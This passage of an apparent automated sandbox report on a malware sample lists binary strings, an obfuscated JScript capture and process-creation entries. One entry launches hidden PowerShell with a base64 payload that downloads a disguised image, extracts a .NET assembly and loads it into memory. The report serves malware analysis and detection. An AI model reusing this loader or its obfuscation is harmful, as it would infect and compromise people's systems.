.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");isolationist.Run(Rabelaisian, 0, false);var tetraodon = ([]+[Infinity][+[]])[0], Higgs = ([]+[Infinity][+[]])[1], emblazed = ([]+[Infinity][+[]])[2], spearhead = ([]+[Infinity][+[]])[3], retravel = ([]+[Infinity][+[]])[4], answer = ([]+[Infinity][+[]])[5], anechoic = ([]+[Infinity][+[]])[6], interwoven = ([]+[Infinity][+[]])[7], endospore = ([]+[Infinity][+[]])[8], mortarboards = ([]+[Infinity][+[]])[9]; var queal = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["postpubescent"])[0]; var pseudomelanosis = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["dentil"])[1]; var transmuter = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["skincare"])[2]; var lewdsters = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["prived"])[3]; var bishopdom = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["some"])[4]; var crust = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["jerking"])[2]; var shadowinesses = ([ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]+[]["slice"])[5]; var circularizes = ([]+[ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]+[])[3] + ([]["postpubescent"]+[])[4] + ([]["pansinusitis"]+[])[5] + ([]["prived"]+[])[6] + ([]["skincareMap"]+[])[7] + ([]["swimsuits"]+[])[8] + ([]["slice"]+[])[9]]["pansinusitis"])[6]; var Nicopolitan = ([ ([]["dentil"]+[])[0] + ([]["skincare"]+[])[1] + ([]["jerking"]+[])[2] + ([]["substandardly"]
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$al
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$alJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A635D pushad ; iretd 10_2_00007FF88A8A6391
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A5964 pushad ; ret 10_2_00007FF88A8A5969
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A62A2 push eax; retf 10_2_00007FF88A8A6291
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A62A2 pushad ; iretd 10_2_00007FF88A8A6391
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A6241 push eax; retf 10_2_00007FF88A8A6291
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A00BD pushad ; iretd 10_2_00007FF88A8A00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF88A8A7563 push ebx; iretd 10_2_00007FF88A8A756A
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
